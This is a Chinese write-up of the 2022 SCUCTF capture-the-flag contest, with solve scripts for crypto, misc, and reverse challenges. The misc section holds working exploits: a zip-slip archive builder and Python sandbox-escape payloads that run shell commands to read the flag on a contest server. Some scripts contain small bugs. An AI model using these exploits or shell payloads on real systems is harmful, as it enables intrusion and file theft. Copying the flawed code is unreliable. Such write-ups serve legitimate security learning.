2022SCUCTF题解

本文共6267字,阅读完需要约35分钟。
版权声明: 知识共享-版权归属-相同方式共享 3.0 授权协议 | CC BY-SA 3.0 CN
展开

systemcall safe on

Crypto

ez_math

二次剩余求解二次同余方程。网上抄的脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from Crypto.Util.number import *
p = 10633422823586641149987674611498617713504538254098629772932594430746901821947698235981680825181906211362587494944457098739784046411665369071558829066081189
a = 1998864314689507283073620353498454561179240654344354244305436493079140699439237202376223842334895492652637067218967769472206166222936609139445293873354277
def convertToBase(n, b):
if(n < 2):
return [n]
temp = n
ans = []
while(temp != 0):
ans = [temp % b]+ ans
temp //= b
return ans

#Takes integer n and odd prime p
#Returns both square roots of n modulo p as a pair (a,b)
#Returns () if no root
def cipolla(n,p):
n %= p
if(n == 0 or n == 1):
return (n,-n%p)
phi = p - 1
if(pow(n, phi//2, p) != 1):
return ()
if(p%4 == 3):
ans = pow(n,(p+1)//4,p)
return (ans,-ans%p)
aa = 0
for i in range(1,p):
temp = pow((i*i-n)%p,phi//2,p)
if(temp == phi):
aa = i
break;
exponent = convertToBase((p+1)//2,2)

def cipollaMult(k,i,w,p):
(a,b) = k
(c,d) = i
return ((a*c+b*d*w)%p,(a*d+b*c)%p)
x1 = (aa,1)
x2 = cipollaMult(x1,x1,aa*aa-n,p)
for i in range(1,len(exponent)):
if(exponent[i] == 0):
x2 = cipollaMult(x2,x1,aa*aa-n,p)
x1 = cipollaMult(x1,x1,aa*aa-n,p)
else:
x1 = cipollaMult(x1,x2,aa*aa-n,p)
x2 = cipollaMult(x2,x2,aa*aa-n,p)
return (x1[0],-x1[0]%p)

print("Roots of a mod p: " +str(cipolla(a,p)))
# print "Roots of 8218 mod 10007: " +str(cipolla(8218,10007))
# print "Roots of 56 mod 101: " +str(cipolla(56,101))
# print "Roots of 1 mod 11: " +str(cipolla(1,11))
# print "Roots of 8219 mod 10007: " +str(cipolla(8219,10007))
print(long_to_bytes(2983806571612194526961405572692022986638740339194067471831909775297069729649384214862874516129034255347837))
print(long_to_bytes(10633422823586641149987674611498617713504538254095645966360982236219940416375006212995042084842712143890755585169160029010134662196802494555429794810733352))

ez_RSA

遍历平方根上/下所有质数即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Util.number import *
from gmpy2 import *
from sympy import nextprime
n = 4035549166201063668625831121705576874008436911538281208575794760645544423624387564688426536718178366478435676670979144680200696978227814830144542100395711
c = 3786139261372475668724096193769377329093814957990266807059048553543359924439586359037603467723438602328535634566311132223900311678610183892863679621498865
# mid = iroot(n, 2)[0]
# ups = mid
# while True:
# # print(ups)
# ups = nextprime(ups)
# if n % ups == 0:
# print(ups, n // ups)
p = 63525972375092879554296019503424174440064543808584645254967172087718895967503
q = 63525972375092879554296019503424174440064543808584645254967172087718895782737
phi = (p - 1) * (q - 1)
e = 65537
d = inverse(e, phi)
print(long_to_bytes(pow(c, d, n)))

ez_stream

单纯的LCG

抄的网上的代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from functools import reduce
from Crypto.Util.number import GCD, inverse, long_to_bytes
def crack_unknown_increment(states, modulus, multiplier):
increment = (states[1] - states[0]*multiplier) % modulus
return modulus, multiplier, increment
def crack_unknown_multiplier(states, modulus):
multiplier = (states[2] - states[1]) * inverse(states[1] - states[0], modulus) % modulus
return crack_unknown_increment(states, modulus, multiplier)
def crack_unknown_modulus(states):
diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])]
zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]
modulus = abs(reduce(GCD, zeroes))
return crack_unknown_multiplier(states, modulus)
streams = [9495827047149859431006132233092319600974497202909253926749062926629593244068453225049157210427035578610572648934127458697875459018625442857002141732217770, 10115020037566558567950233730614138895861258911796641397386881027127960456781622215464273323776545118396888793579040620180155181472925379479313621734027106, 7981464236725021226761002919675861665400231148613997426185256093560877035104768633006706451402090228382477159223882030737510433675925204999566093494578649, 7234746427175795537750797360089344216037062205426141685667019106513326156971404038531885341019184616074232937324413429612387506532206135481520255585379406, 1357271691014350448396348499212607078815784207280436403590895273573976719039929574669406267302326522264476319971818333746270219399739509954488350206939098, 7793179134619447746786204535466843534146448146433627831440211439100356628823998206285679114995319552700902657159016155894261217929142592869048023480586212, 4200327504806355753051034681672501621139445844167069726269562915330857270053067365147343903654640822017169864193359688974572363544448011864141566263095749, 108628953170107941851019292289726767457637648818478130784905137964469415279928037910613035615390728484479166491155355807849114853079424541224944189539847, 5705546688186793363975386254231457567617039881042153075212145501441367909435598304220032988441701636156883589472050191697468859533156776122580445917630325, 7981888661925380274343353230517871440910482184881452246559514192102636787698437211797463663103264392789656523953870523387090188318571331660341390462731390, 7457245978258721215462104387713889824053460895409859984119211875448230853693133504670379095111834060476305868684456810408551054941569397242555875768832649, 4713653327629167917403933577518371673458093664892888492572355124165551105119901889718017605151941173424260920921889047705106706830968478068151992223522578, 2778597751579300390231070107111625883828070769573760110725311512998545986829373825533426150065870859785603212189825907356142828522955158081072354492809680, 9425692327305131597174516996805078131281224792942807687405090540733107737207289300618346774901368434264552235754283457515007094594155397130150749105141065, 9556791103080784553100760363166943075547406777892268608148510940860093314305835822848257344853594949658922763296325860053473764167311744969251511348213287, 3896599182642428007339381753538662783145048962607822890502362802858865113464050570340177651462017198029133580814296850288701444407514341373723669684607404, 5301032047745045360653610644813773116678094274772865081138467683002390318886475845448249954952652462684815881485467937894005492015515126563397015290271507, 10868560876138340913503045822008353068681490521878057747798994346359112617020680300987213799662349291611409047377282385725263726186142570966125699633074711, 7224059293852369017807048556361213684202031860793036930767704651075967932687581020962849350943008127181892942681851425187555531885333162641401020598706109, 7226506847869420283438523642497968822001335509181374339634589228508210118084622247062696000754665385287906355641339893928516640360280080695911187254582014, 4490720948265923860968128277045129252750568336235325441630922401592392266045933527280025412489344475057552346462497460984868092646213341802194388892641162, 12239413304325398135459519900658880538898158568425938945987878203058591924624777413114550809099368944806146909046355605791667787917390610337772668459482241, 12031682149667615392071800744401356969359813602233530042569742700015933405128350539724007232636961842858808427912797934459072652111927403074732121115504628, 4221093662830924228203427096071485647982605270125869903377211974849182525446297391581648132634312810831050522760260275007179715712643712807112993795753997, 2482697446655927304158367339258791596351991275787745319752390116410069174704817051381264029708263048001624482866674356617492861541235444301461140118393072, 8640022216821216730690651815111823956880449322964650463439245341042028148002067020497662105357100062992076913929538672631319194491404650014998985176729399, 2359340306264030427013371066451754161105421482248597639896728896779325719717468031430724904579038543182751480657717151072505664496249601885013517511335354, 9564043228397984061879998221762974239257692421128455446103840572377581806608193811671996975444148075468746455929973308146521294633753660232825656123106269, 2907481445175213163867320739818049791618436439840769557448890646035507771955530568981806701569558507904871970470593181264954913164043063396749090598187913, 10918758557560698694046891429167354585108582071006014989054758320395366657576667871567836659358610198829544520915724060818132910952992777240463509701288475]
modulus, multiplier, increment = (crack_unknown_modulus(streams))
flag = (streams[0] - increment) * inverse(multiplier, modules) % modulus
print(long_to_bytes(flag))

medium_math

中国剩余定理。爆破模数。检查是否全部printable

脚本网上抄的,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
ps = [659393664465323, 906528195345220, 975250387802548, 969115381470588, 111169318220929, 1000427453556060, 954439163305195]
ans = [501927404661911, 766711039999273, 177155835710273, 288656999508165, 71725206442480, 876880066906893, 315100179694493]
import hashlib
from functools import reduce
from gmpy2 import gcd
from Crypto.Util.number import *
from string import printable

Num = 7
m = ps
a = ans
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)

def china(num):
m1,a1,lcm=m[0],a[0],m[0]
for i in range(1,num):
m2=m[i]
a2=a[i]
c=a2-a1
g,k1,k2=egcd(m1,m2)
lcm=lcm*m[i]//gcd(lcm,m[i])
if c%g :
print('No Answer!')
return 0
x0=c//g*k1
t=m2//g
x0=(x0%t+t)%t
a1+=m1*x0
m1=m2//g*m1
return a1, lcm
ans, lcm=china(Num)
print(ans, lcm)
# print(ans + )
# f = open("mid", "w")
while ans.bit_length() < 355:
ans += lcm
fl = 1
for i in long_to_bytes(ans):
if not chr(i) in printable:
fl = 0
break
if fl == 1:
print(long_to_bytes(ans))
# if b"scuctf" in long_to_bytes(ans):
# f.write(str()))
# print()

medium_RSA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from Crypto.Util.number import bytes_to_long, getPrime
from random import getrandbits
from secret import flag

m = bytes_to_long(flag)
e = 0x10001
Bit = 512
num = 10
p = getPrime(Bit)
q = getPrime(Bit)
n = p*q
c = pow(m, e, n)
A = 2*p + getrandbits(10)
for _ in range(num):
A *= (2*p + getrandbits(10))

print(n)
print(c)
print(A)

# 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
# 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
# 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000

以下是exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from gmpy2 import *
from sympy import *
from Crypto.Util.number import *
num = 10
n = 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
c = 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
A = 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000
# p = iroot(A // pow(2, 11), 11)[0]
p = 11084976913707120845676997473476120049925696537758139093110720348331501885877388177868038354130254514285517993448105804093297456650430613525974991412673613
q = n // p
phi = (p - 1) * (q - 1)
e = 65537
d = inverse(e, phi)
print(long_to_bytes(pow(c, d, n)))
# p = iroot(A, 10)[0] // pow(2, 10)
# while True:
# # print(p)
# p = prevprime(p)
# if n % p == 0:
# print(p)
# break

medium_stream

秘钥复用。

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import xor
from Crypto.Util.number import *
flag_k = 0x17cd2b76cea2303805f63a5dd38c0652f542d796d316dfcbc1ca5d0514f6096bb4f41fd2d2f45de0114a2b7d
known = 0x37e64f5efb8f3e7b7ba12f0d8fd84508a6129fc19051c1ddcb821f4242b6507be1e758c686a108f2455a3c7d

# flag_k = long_to_bytes(flag_k)
# knwon = long_to_bytes(known)
knwon_p = bytes_to_long(b'sh1kaku{Of all weapons,the past cut deepest}')
lens = len(long_to_bytes(flag_k))
# print(lens, len(long_to_bytes(known)), 5120)
# print(xor(flag_k, known))
print(long_to_bytes(flag_k ^ known ^ knwon_p))

ez_copper

考虑类似Factor with high bits known的做法

把多项式F(x) 变成,首一化后coppersmith即可。

1668743519285

然后就是基础的RSA

medium_copper

先通过dp泄露的原理推式子,得到,可以得知

考虑在模的意义下解方程,即,解出来后为的可能值,然后就是ez_copper

hard_math

考虑flag的前7位是一定的,枚举模数p,求出p的原根后可以列出以七个变量的七个方程,解出方程验证后还原flag即可

Misc

LSB but base64

先用stegesolve查看LSB发现均为乱码
1
根据提示:b64encode得知要base64加密先将16进制数字转变回byte再base64加密

1
2
3
4
5
from base64 import *
from Crypto.Util.number import *
a=0x7E56A0FA2B3E5B795CD267BEEE8FB972E72D7FEE2777E9B5B1CFA2E7EBF7AF2F9FBA79F2
byte = long_to_bytes(a)
b64encode(byte)

得到结果
2

豪豪的晚餐

  1. 图片中有烤匠两个字确定店子是烤匠
  2. exif查看有经纬度,谷歌地图定位后找一个标志后输入到百度地图中点周边,美食,看最近的一家烤匠再去美团核实店名即可。

小宇的通勤

向上的指示牌是地铁2号和8号线,发现是同一种颜色,上网搜地铁线路标识色发现只有深圳地铁2号和8号是同一条,再看下面的地铁是黄色的确定是14号线,看交汇点既是结果:岗厦北。

豪豪扫描器

notepad++直接搜scu得到答案

3

Chicken

010editor打开最底下发现一串base64解码即使答案
4
5

后来

解的时候走了很多弯路,识图都识别不出来,试了很多办法都没用,搜索结果中也没有想要的,最后在浏览一个网址的时候发现和图中白色柱子长得一样的柱子。
6

[medium]unzip

1
2
3
4
5
6
7
8
9
10
from zipfile import *
from base64 import *
zipf = ZipFile("Uploads.zip", "w")
source_file = "flag"
zipf.write(source_file, "../../../flag")
zipf.close()

fi = open("Uploads.zip", "rb")
base64d = b64encode(fi.read())
print(base64d.decode("ascii"))

上传该文件,然后再 2查看解压后的文件地址,读出 /flag

[easy]learning_python

1
2
3
4
5
6
7
from pwn import *
context(log_level = "debug")
sh = remote("114.117.187.56", 8901)
sh.recv()
payload = '__import__("os").system("cd .. ; cd .. ; cat flag")'
sh.sendline(payload.encode())
sh.recv()

[medium]learning python2

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context(log_level = "debug")
sh = remote("114.117.187.56", 8902)
sh.recv()
payload = '__import__("os").system("cd .. ; cd .. ; cat flag")'
payloads = "eval("
for i in payload:
payloads += ("chr(" + str(ord(i)) + ")" + "+")
payloads = payloads[0:-1] + ")"
print(payloads)
sh.sendline(payloads.encode())
sh.recv()

learning python3

没有好好验题是这样的。

预期解可能是用 __subclasses__之类的花活。

1
2
3
4
5
6
7
from pwn import *
context(log_level = "debug")
sh = remote("114.117.187.56", 8903)
sh.recv()
payload = 'print(open("/flag", "r").read())'
sh.sendline(payload.encode())
sh.recv()

Reverse

ez_pyc

反编译。一眼z3-solver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from z3 import *

flag = [BitVec("%d" % i, 8) for i in range(25)]
s = Solver()
s.add(99 * flag[0] + 91 * flag[1] + 69 * flag[2] + 42 * flag[3] + 65 * flag[4] + 86 * flag[5] + 63 * flag[6] + 9 * flag[7] + 60 * flag[8] + 82 * flag[9] + 61 * flag[10] + 65 * flag[11] + 14 * flag[12] + 86 * flag[13] + 2 * flag[14] + 53 * flag[15] + 56 * flag[16] + 17 * flag[17] + 88 * flag[18] + 20 * flag[19] + 6 * flag[20] + 21 * flag[21] + 100 * flag[22] + 24 * flag[23] + 11 * flag[24] == 133017)
s.add(99 * flag[0] + 2 * flag[1] + 14 * flag[2] + 30 * flag[3] + 38 * flag[4] + 23 * flag[5] + 6 * flag[6] + 100 * flag[7] + 43 * flag[8] + 58 * flag[9] + 82 * flag[10] + 20 * flag[11] + 19 * flag[12] + 39 * flag[13] + 16 * flag[14] + 1 * flag[15] + 15 * flag[16] + 82 * flag[17] + 97 * flag[18] + 47 * flag[19] + 28 * flag[20] + 51 * flag[21] + 96 * flag[22] + 54 * flag[23] + 43 * flag[24] == 113856)
s.add(63 * flag[0] + 86 * flag[1] + 33 * flag[2] + 39 * flag[3] + 45 * flag[4] + 76 * flag[5] + 37 * flag[6] + 64 * flag[7] + 65 * flag[8] + 56 * flag[9] + 32 * flag[10] + 69 * flag[11] + 38 * flag[12] + 1 * flag[13] + 20 * flag[14] + 44 * flag[15] + 16 * flag[16] + 78 * flag[17] + 12 * flag[18] + 97 * flag[19] + 29 * flag[20] + 46 * flag[21] + 54 * flag[22] + 81 * flag[23] + 47 * flag[24] == 126193)
s.add(9 * flag[0] + 100 * flag[1] + 1 * flag[2] + 5 * flag[3] + 99 * flag[4] + 20 * flag[5] + 37 * flag[6] + 91 * flag[7] + 53 * flag[8] + 85 * flag[9] + 52 * flag[10] + 49 * flag[11] + 69 * flag[12] + 32 * flag[13] + 7 * flag[14] + 81 * flag[15] + 80 * flag[16] + 89 * flag[17] + 87 * flag[18] + 24 * flag[19] + 90 * flag[20] + 54 * flag[21] + 16 * flag[22] + 6 * flag[23] + 2 * flag[24] == 128397)
s.add(72 * flag[0] + 18 * flag[1] + 71 * flag[2] + 28 * flag[3] + 67 * flag[4] + 25 * flag[5] + 26 * flag[6] + 59 * flag[7] + 96 * flag[8] + 30 * flag[9] + 65 * flag[10] + 39 * flag[11] + 29 * flag[12] + 35 * flag[13] + 95 * flag[14] + 55 * flag[15] + 67 * flag[16] + 63 * flag[17] + 72 * flag[18] + 61 * flag[19] + 30 * flag[20] + 74 * flag[21] + 38 * flag[22] + 61 * flag[23] + 58 * flag[24] == 138932)
s.add(30 * flag[0] + 69 * flag[1] + 52 * flag[2] + 68 * flag[3] + 94 * flag[4] + 37 * flag[5] + 13 * flag[6] + 85 * flag[7] + 97 * flag[8] + 66 * flag[9] + 57 * flag[10] + 40 * flag[11] + 11 * flag[12] + 93 * flag[13] + 87 * flag[14] + 22 * flag[15] + 61 * flag[16] + 3 * flag[17] + 17 * flag[18] + 54 * flag[19] + 22 * flag[20] + 18 * flag[21] + 57 * flag[22] + 58 * flag[23] + 88 * flag[24] == 136211)
s.add(81 * flag[0] + 62 * flag[1] + 83 * flag[2] + 60 * flag[3] + 71 * flag[4] + 64 * flag[5] + 96 * flag[6] + 88 * flag[7] + 96 * flag[8] + 39 * flag[9] + 23 * flag[10] + 77 * flag[11] + 85 * flag[12] + 87 * flag[13] + 3 * flag[14] + 3 * flag[15] + 56 * flag[16] + 67 * flag[17] + 59 * flag[18] + 11 * flag[19] + 32 * flag[20] + 41 * flag[21] + 1 * flag[22] + 71 * flag[23] + 10 * flag[24] == 141572)
s.add(95 * flag[0] + 66 * flag[1] + 37 * flag[2] + 55 * flag[3] + 2 * flag[4] + 29 * flag[5] + 65 * flag[6] + 85 * flag[7] + 68 * flag[8] + 95 * flag[9] + 77 * flag[10] + 16 * flag[11] + 2 * flag[12] + 94 * flag[13] + 54 * flag[14] + 92 * flag[15] + 44 * flag[16] + 48 * flag[17] + 70 * flag[18] + 25 * flag[19] + 57 * flag[20] + 48 * flag[21] + 74 * flag[22] + 63 * flag[23] + 49 * flag[24] == 143300)
s.add(79 * flag[0] + 85 * flag[1] + 53 * flag[2] + 93 * flag[3] + 69 * flag[4] + 33 * flag[5] + 63 * flag[6] + 2 * flag[7] + 93 * flag[8] + 82 * flag[9] + 73 * flag[10] + 37 * flag[11] + 91 * flag[12] + 13 * flag[13] + 1 * flag[14] + 62 * flag[15] + 60 * flag[16] + 17 * flag[17] + 7 * flag[18] + 95 * flag[19] + 65 * flag[20] + 91 * flag[21] + 14 * flag[22] + 64 * flag[23] + 66 * flag[24] == 146502)
s.add(33 * flag[0] + 57 * flag[1] + 13 * flag[2] + 85 * flag[3] + 83 * flag[4] + 31 * flag[5] + 73 * flag[6] + 41 * flag[7] + 19 * flag[8] + 41 * flag[9] + 80 * flag[10] + 33 * flag[11] + 5 * flag[12] + 42 * flag[13] + 3 * flag[14] + 27 * flag[15] + 1 * flag[16] + 55 * flag[17] + 24 * flag[18] + 72 * flag[19] + 21 * flag[20] + 98 * flag[21] + 89 * flag[22] + 58 * flag[23] + 41 * flag[24] == 118533)
s.add(29 * flag[0] + 5 * flag[1] + 52 * flag[2] + 22 * flag[3] + 21 * flag[4] + 8 * flag[5] + 41 * flag[6] + 10 * flag[7] + 51 * flag[8] + 69 * flag[9] + 90 * flag[10] + 63 * flag[11] + 90 * flag[12] + 24 * flag[13] + 91 * flag[14] + 99 * flag[15] + 40 * flag[16] + 6 * flag[17] + 17 * flag[18] + 81 * flag[19] + 47 * flag[20] + 100 * flag[21] + 99 * flag[22] + 3 * flag[23] + 46 * flag[24] == 124392)
s.add(59 * flag[0] + 64 * flag[1] + 99 * flag[2] + 26 * flag[3] + 76 * flag[4] + 42 * flag[5] + 37 * flag[6] + 62 * flag[7] + 14 * flag[8] + 15 * flag[9] + 15 * flag[10] + 49 * flag[11] + 10 * flag[12] + 88 * flag[13] + 5 * flag[14] + 3 * flag[15] + 52 * flag[16] + 70 * flag[17] + 89 * flag[18] + 37 * flag[19] + 98 * flag[20] + 1 * flag[21] + 18 * flag[22] + 75 * flag[23] + 13 * flag[24] == 118223)
s.add(66 * flag[0] + 65 * flag[1] + 5 * flag[2] + 80 * flag[3] + 42 * flag[4] + 93 * flag[5] + 42 * flag[6] + 15 * flag[7] + 1 * flag[8] + 90 * flag[9] + 4 * flag[10] + 14 * flag[11] + 97 * flag[12] + 25 * flag[13] + 68 * flag[14] + 93 * flag[15] + 78 * flag[16] + 33 * flag[17] + 33 * flag[18] + 70 * flag[19] + 21 * flag[20] + 10 * flag[21] + 25 * flag[22] + 92 * flag[23] + 43 * flag[24] == 122643)
s.add(25 * flag[0] + 95 * flag[1] + 15 * flag[2] + 82 * flag[3] + 82 * flag[4] + 99 * flag[5] + 9 * flag[6] + 60 * flag[7] + 74 * flag[8] + 8 * flag[9] + 82 * flag[10] + 99 * flag[11] + 79 * flag[12] + 83 * flag[13] + 8 * flag[14] + 42 * flag[15] + 41 * flag[16] + 75 * flag[17] + 93 * flag[18] + 75 * flag[19] + 36 * flag[20] + 57 * flag[21] + 84 * flag[22] + 99 * flag[23] + 67 * flag[24] == 166882)
s.add(26 * flag[0] + 14 * flag[1] + 83 * flag[2] + 22 * flag[3] + 62 * flag[4] + 50 * flag[5] + 68 * flag[6] + 95 * flag[7] + 27 * flag[8] + 99 * flag[9] + 29 * flag[10] + 31 * flag[11] + 12 * flag[12] + 37 * flag[13] + 18 * flag[14] + 51 * flag[15] + 36 * flag[16] + 72 * flag[17] + 98 * flag[18] + 96 * flag[19] + 25 * flag[20] + 49 * flag[21] + 6 * flag[22] + 59 * flag[23] + 2 * flag[24] == 120884)
s.add(15 * flag[0] + 51 * flag[1] + 6 * flag[2] + 80 * flag[3] + 72 * flag[4] + 49 * flag[5] + 13 * flag[6] + 28 * flag[7] + 57 * flag[8] + 1 * flag[9] + 43 * flag[10] + 82 * flag[11] + 36 * flag[12] + 36 * flag[13] + 55 * flag[14] + 2 * flag[15] + 96 * flag[16] + 29 * flag[17] + 2 * flag[18] + 82 * flag[19] + 60 * flag[20] + 65 * flag[21] + 100 * flag[22] + 37 * flag[23] + 12 * flag[24] == 118151)
s.add(32 * flag[0] + 44 * flag[1] + 6 * flag[2] + 70 * flag[3] + 17 * flag[4] + 49 * flag[5] + 66 * flag[6] + 51 * flag[7] + 29 * flag[8] + 13 * flag[9] + 38 * flag[10] + 26 * flag[11] + 27 * flag[12] + 18 * flag[13] + 73 * flag[14] + 1 * flag[15] + 67 * flag[16] + 45 * flag[17] + 10 * flag[18] + 49 * flag[19] + 63 * flag[20] + 9 * flag[21] + 75 * flag[22] + 46 * flag[23] + 88 * flag[24] == 105637)
s.add(39 * flag[0] + 90 * flag[1] + 54 * flag[2] + 62 * flag[3] + 25 * flag[4] + 97 * flag[5] + 53 * flag[6] + 92 * flag[7] + 90 * flag[8] + 34 * flag[9] + 53 * flag[10] + 91 * flag[11] + 84 * flag[12] + 78 * flag[13] + 88 * flag[14] + 8 * flag[15] + 88 * flag[16] + 24 * flag[17] + 86 * flag[18] + 33 * flag[19] + 98 * flag[20] + 46 * flag[21] + 69 * flag[22] + 80 * flag[23] + 47 * flag[24] == 168627)
s.add(1 * flag[0] + 50 * flag[1] + 59 * flag[2] + 85 * flag[3] + 14 * flag[4] + 89 * flag[5] + 12 * flag[6] + 64 * flag[7] + 1 * flag[8] + 49 * flag[9] + 97 * flag[10] + 8 * flag[11] + 11 * flag[12] + 59 * flag[13] + 40 * flag[14] + 13 * flag[15] + 73 * flag[16] + 82 * flag[17] + 98 * flag[18] + 50 * flag[19] + 43 * flag[20] + 70 * flag[21] + 93 * flag[22] + 5 * flag[23] + 7 * flag[24] == 123563)
s.add(83 * flag[0] + 41 * flag[1] + 15 * flag[2] + 86 * flag[3] + 1 * flag[4] + 18 * flag[5] + 7 * flag[6] + 93 * flag[7] + 72 * flag[8] + 49 * flag[9] + 48 * flag[10] + 26 * flag[11] + 83 * flag[12] + 70 * flag[13] + 18 * flag[14] + 28 * flag[15] + 32 * flag[16] + 77 * flag[17] + 81 * flag[18] + 5 * flag[19] + 61 * flag[20] + 8 * flag[21] + 98 * flag[22] + 94 * flag[23] + 22 * flag[24] == 125124)
s.add(40 * flag[0] + 63 * flag[1] + 90 * flag[2] + 28 * flag[3] + 52 * flag[4] + 79 * flag[5] + 21 * flag[6] + 77 * flag[7] + 86 * flag[8] + 91 * flag[9] + 50 * flag[10] + 95 * flag[11] + 82 * flag[12] + 30 * flag[13] + 60 * flag[14] + 2 * flag[15] + 97 * flag[16] + 33 * flag[17] + 11 * flag[18] + 30 * flag[19] + 64 * flag[20] + 40 * flag[21] + 4 * flag[22] + 2 * flag[23] + 1 * flag[24] == 126844)
s.add(61 * flag[0] + 9 * flag[1] + 36 * flag[2] + 17 * flag[3] + 13 * flag[4] + 53 * flag[5] + 96 * flag[6] + 41 * flag[7] + 28 * flag[8] + 63 * flag[9] + 20 * flag[10] + 4 * flag[11] + 71 * flag[12] + 99 * flag[13] + 37 * flag[14] + 2 * flag[15] + 58 * flag[16] + 38 * flag[17] + 75 * flag[18] + 29 * flag[19] + 34 * flag[20] + 66 * flag[21] + 82 * flag[22] + 39 * flag[23] + 50 * flag[24] == 116479)
s.add(51 * flag[0] + 56 * flag[1] + 13 * flag[2] + 6 * flag[3] + 80 * flag[4] + 8 * flag[5] + 99 * flag[6] + 76 * flag[7] + 14 * flag[8] + 32 * flag[9] + 99 * flag[10] + 7 * flag[11] + 27 * flag[12] + 32 * flag[13] + 20 * flag[14] + 23 * flag[15] + 79 * flag[16] + 89 * flag[17] + 54 * flag[18] + 78 * flag[19] + 23 * flag[20] + 89 * flag[21] + 96 * flag[22] + 85 * flag[23] + 94 * flag[24] == 139277)
s.add(3 * flag[0] + 17 * flag[1] + 78 * flag[2] + 6 * flag[3] + 75 * flag[4] + 18 * flag[5] + 29 * flag[6] + 1 * flag[7] + 49 * flag[8] + 8 * flag[9] + 90 * flag[10] + 60 * flag[11] + 62 * flag[12] + 13 * flag[13] + 16 * flag[14] + 87 * flag[15] + 38 * flag[16] + 71 * flag[17] + 39 * flag[18] + 12 * flag[19] + 47 * flag[20] + 7 * flag[21] + 54 * flag[22] + 83 * flag[23] + 64 * flag[24] == 109760)
s.add(58 * flag[0] + 1 * flag[1] + 51 * flag[2] + 94 * flag[3] + 69 * flag[4] + 86 * flag[5] + 45 * flag[6] + 14 * flag[7] + 23 * flag[8] + 4 * flag[9] + 25 * flag[10] + 9 * flag[11] + 72 * flag[12] + 85 * flag[13] + 35 * flag[14] + 39 * flag[15] + 92 * flag[16] + 43 * flag[17] + 19 * flag[18] + 26 * flag[19] + 76 * flag[20] + 55 * flag[21] + 52 * flag[22] + 59 * flag[23] + 24 * flag[24] == 121674)

a = s.check()
print(a)
result = s.model()
print(result)
for i in range(26):
print(chr(result[i]), end = "")
# result = [18 = 118,
# 20 = 114,
# 24 = 121,
# 2 = 108,
# 12 = 97,
# 13 = 110,
# 3 = 111,
# 10 = 104,
# 15 = 85,
# 17 = 105,
# 7 = 83,
# 16 = 110,
# 21 = 115,
# 23 = 116,
# 5 = 101,
